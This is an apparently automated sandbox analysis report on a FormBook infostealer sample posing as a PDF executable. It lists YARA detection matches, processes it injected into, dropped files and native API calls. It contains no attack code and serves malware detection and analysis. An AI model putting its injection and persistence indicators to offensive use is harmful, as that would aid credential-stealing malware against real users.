Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrv.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\101 2043 5770 pdf.exe

Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A330 NtCreateFile,	6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A3E0 NtReadFile,	6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A460 NtClose,	6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A510 NtAllocateVirtualMemory,	6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A2EA NtCreateFile,	6_2_0041A2EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A32B NtCreateFile,	6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_059A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_059A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_059A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_059A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_059A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_059A2C70
